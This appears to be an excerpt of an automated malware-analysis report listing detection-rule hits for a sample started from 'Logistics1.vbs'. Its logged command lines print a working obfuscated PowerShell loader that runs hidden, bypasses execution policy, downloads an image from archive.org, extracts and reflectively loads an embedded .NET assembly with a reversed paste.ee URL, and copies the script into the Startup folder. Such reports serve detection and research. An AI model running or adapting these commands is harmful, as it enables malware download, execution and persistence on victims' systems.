            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5k
            Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5k
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs", ProcessId: 7540, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5k
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgne
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgne
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs", ProcessId: 7540, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7632, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')'), ProcessId: 7792, ProcessName: powershell.exe
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: 